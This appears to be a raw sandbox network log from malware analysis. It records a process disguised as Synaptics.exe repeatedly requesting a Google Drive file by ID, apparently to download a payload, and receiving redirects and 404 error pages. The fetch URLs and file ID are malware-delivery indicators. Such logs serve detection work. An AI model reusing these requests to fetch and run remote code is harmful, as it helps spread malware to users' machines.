                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-XP08VVs4RfPDeN6ZVXqOkg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.1649721142.250.185.654433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:38 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-15 10:23:38 UTC1597INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:38 GMT
                                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-KID8Bmmfkos1AQa7FbFDIA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AFiumC6aod1xvXH4RJbmt60hFaE47qEFTrppxOCXzSxyUAb1LHVbPTK9iq5HL-vp3kAuyfuN130
                                                                                                            Server: UploadServer
                                                                                                            Set-Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14; expires=Sat, 17-May-2025 10:23:38 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:23:38 UTC1597INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 37 64 69 33 32 37 79 78 6a 6d 7a 64 62 38 6d 59 59 68 44 61 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="q7di327yxjmzdb8mYYhDaA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                            2024-11-15 10:23:38 UTC55INData Raw: 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.1649722142.250.185.654433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:38 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            10192.168.2.1649728142.250.186.784433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:39 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            2024-11-15 10:23:39 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:39 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-cCB6jCs1tD_h1BOIKhl-pw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            11192.168.2.1649727142.250.186.784433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:39 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            2024-11-15 10:23:40 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:39 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-bHJ03HsDALuog1mY1MpR5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            12192.168.2.1649729142.250.185.654433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:39 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=SEIp9Ft1pM_DTSp4ZWAE2JXd5p6vYnOenYasNDVud7Yu6_XlLVZWsdgqTMAV0WJp8gbHLzac7m-O074jzZozfmgMpTLCdPEbll-92cpDhan5otbZ5vTSOiiwCIw1pFCy9i0rkRERXyoZZbduoCGvMnLGpGFYBf-d6w_ZXbzQtTOeATiGU0dEJLQO
                                                                                                            2024-11-15 10:23:40 UTC1253INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:39 GMT
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-MbFjJOfr2lxQDAYD5AA7Gg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AFiumC6xvvkf5JEWNm-Ebn0hiW1kBU41BGLEaRKdWiflC-APIEpLNolaXMv8I9Q3pLhL7kzFVwD7hwXKNQ
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:23:40 UTC125INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width
                                                                                                            2024-11-15 10:23:40 UTC1378INData Raw: 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 35 67 32 72 44 4d 4e 44 6f 6d 64 2d 43 78 42 66 66 54 6a 68 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69
                                                                                                            Data Ascii: "><title>Error 404 (Not Found)!!1</title><style nonce="45g2rDMNDomd-CxBffTjhA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;mi
                                                                                                            2024-11-15 10:23:40 UTC149INData Raw: 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            13192.168.2.1649735142.250.186.784433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:40 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            2024-11-15 10:23:41 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:41 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-HzTxAU4Jdrupq6aT6q1X7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            14192.168.2.1649734142.250.185.654433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:40 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:23:41 UTC1246INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:41 GMT
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-x9y0utDfJiKu31ywvBbS_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AFiumC7L2BXvs262vS2RCRr1XhfzU8weUU737nJjB4ff9xin1Iu_yxpEYqP6CE2CWgkgSeSDMB0
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:23:41 UTC132INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><titl
                                                                                                            2024-11-15 10:23:41 UTC1378INData Raw: 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 6c 43 39 63 72 65 42 73 71 48 46 44 52 77 49 62 63 6e 30 35 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68
                                                                                                            Data Ascii: e>Error 404 (Not Found)!!1</title><style nonce="UlC9creBsqHFDRwIbcn05Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-heigh
                                                                                                            2024-11-15 10:23:41 UTC142INData Raw: 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: pan></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            15192.168.2.1649733142.250.186.784433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:40 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            2024-11-15 10:23:41 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:41 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-ghQXt_r_IlrKCoBLQpI60Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            16192.168.2.1649736142.250.185.654433588C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:23:40 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:23:41 UTC1246INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:23:41 GMT
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-AT4tiocDJ7GXbZrMx4bX9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AFiumC6sXoB-DQ3X68mRqwrwTwB86msQX0Am439MkhnBXj8L7rA-JKo93560cs_SqJvE05cXjtA
                                                                                                            Server: UploadServer
